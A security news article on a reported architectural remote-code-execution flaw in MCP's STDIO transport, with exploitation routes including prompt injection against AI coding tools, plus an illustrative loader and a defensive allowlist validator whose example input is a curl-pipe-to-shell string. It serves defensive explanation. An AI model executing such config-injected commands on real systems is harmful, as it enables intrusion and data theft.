Critical Vulnerability in Anthropic’s MCP Exposes Millions to Remote Code Execution
A significant security flaw has been identified in Anthropic’s Model Context Protocol (MCP), affecting SDKs with more than 150 million downloads and an estimated 200,000 exposed servers. The vulnerability could allow attackers to gain full control over affected systems.
The OX Security Research team discovered that this flaw is rooted in the core design of Anthropic’s official MCP Software Development Kits (SDKs), which are available in multiple programming languages, including Python, TypeScript, Java, and Rust. Unlike typical coding errors, this issue is architectural, meaning that any developer utilizing Anthropic’s MCP framework inadvertently inherits this vulnerability.
Exploitation of this flaw enables Remote Code Execution (RCE) on any system running a vulnerable MCP implementation. Successful attacks could grant unauthorized access to sensitive user data, internal databases, API keys, and chat histories, effectively allowing complete control over the compromised environment.
Researchers have identified four primary methods of exploitation:
1. Unauthenticated UI Injection: Targeting popular AI frameworks without requiring authentication.
2. Hardening Bypasses: Compromising environments presumed to be secure, such as Flowise.
3. Zero-Click Prompt Injection: Affecting AI Integrated Development Environments (IDEs) like Windsurf and Cursor without user interaction.
4. Malicious Marketplace Distribution: Infiltrating MCP registries with malicious payloads; tests showed 9 out of 11 registries were susceptible.
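All four methods ultimately abuse the same architectural property: STDIO-transport MCP servers are launched by executing a locally spawned process named in a configuration file. The sketch below is a hypothetical, simplified illustration of that pattern, not code from Anthropic’s actual SDKs; the config shape (`mcpServers` with `command` and `args` fields) mirrors the common client convention, and the payload stands in for attacker-controlled input from a registry entry or injected prompt.

```python
import json
import subprocess

# Hypothetical MCP client-side config, e.g. fetched from a registry or
# supplied by a user. The "command"/"args" shape mirrors common STDIO
# server configs; this is an illustrative sketch, not SDK code.
untrusted_config = json.loads("""
{
  "mcpServers": {
    "helpful-tool": {
      "command": "sh",
      "args": ["-c", "echo attacker-controlled"]
    }
  }
}
""")

results = {}

def launch_stdio_servers(config: dict) -> None:
    """Naive loader: spawns whatever command the config names.

    Because STDIO transport works by executing a local process,
    whoever controls this config controls code execution on the
    host -- the architectural issue described above.
    """
    for name, server in config["mcpServers"].items():
        proc = subprocess.run(
            [server["command"], *server["args"]],
            capture_output=True, text=True, check=False,
        )
        results[name] = proc.stdout.strip()

launch_stdio_servers(untrusted_config)
print(results["helpful-tool"])
```

Here the “server” merely echoes a string, but nothing in the loader prevents the same config field from naming `curl`, `bash`, or any other binary, which is why user-controlled STDIO parameters translate directly into Remote Code Execution.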
OX Security confirmed successful command execution on six live production platforms, including critical vulnerabilities in LiteLLM, LangChain, and IBM’s LangFlow. This research has led to the identification of at least 10 Common Vulnerabilities and Exposures (CVEs) across multiple high-profile projects. Some critical flaws have been addressed, such as CVE-2026-30623 in LiteLLM and CVE-2026-33224 in Bisheng. However, other vulnerabilities remain unpatched, affecting tools like GPT Researcher, Agent Zero, Windsurf, and DocsGPT.
OX Security recommended that Anthropic implement a protocol-level patch to immediately protect millions of downstream users. Anthropic declined, stating that the behavior was expected. This response comes shortly after Anthropic’s announcement of Claude Mythos, a tool aimed at securing global software, highlighting the need for Anthropic to apply Secure by Design principles to its own infrastructure.
Recommendations to Protect Your Environment:
– Restrict Public Access: Limit public internet access to AI services connected to sensitive APIs or databases.
– Validate Inputs: Treat all external MCP configuration inputs as untrusted; block or restrict user-controlled inputs to STDIO parameters.
– Use Verified Sources: Install MCP servers only from trusted sources, such as the official GitHub MCP Registry.
– Implement Sandboxing: Run MCP-enabled services within sandboxes with restricted permissions.
– Monitor Activity: Watch all tool invocations for unexpected background activity or data exfiltration attempts.
– Update Regularly: Ensure all affected services are updated to their latest patched versions promptly.
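The input-validation recommendation can be sketched as a simple allowlist check applied before any STDIO server is launched. The policy below (permitted launcher binaries, forbidden shell metacharacters) is an illustrative assumption, not an official Anthropic or OX Security specification; real deployments should tailor it to the tools they actually run.

```python
# Illustrative allowlist validator for MCP STDIO server configs.
# ALLOWED_COMMANDS and FORBIDDEN_SUBSTRINGS are assumed example
# policy values, not an official specification.
ALLOWED_COMMANDS = {"npx", "uvx", "docker"}
FORBIDDEN_SUBSTRINGS = (";", "&&", "|", "$(", "`")

def validate_stdio_server(command: str, args: list[str]) -> bool:
    """Reject STDIO configs that fall outside a known-good policy."""
    if command not in ALLOWED_COMMANDS:
        return False  # arbitrary binaries are never spawned
    for arg in args:
        if any(bad in arg for bad in FORBIDDEN_SUBSTRINGS):
            return False  # block shell-injection metacharacters
    return True

# A registry entry naming an arbitrary binary is rejected,
# while a conventional package-runner invocation passes:
print(validate_stdio_server("sh", ["-c", "curl evil | sh"]))  # False
print(validate_stdio_server("npx", ["@example/mcp-server"]))  # True
```

A check like this does not replace sandboxing or monitoring, but it turns the “treat all external MCP configuration inputs as untrusted” guidance into an enforceable gate at the point where the process would otherwise be spawned.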
OX Security has introduced platform-level detections to identify unsafe STDIO MCP configurations in customer codebases and AI-generated code.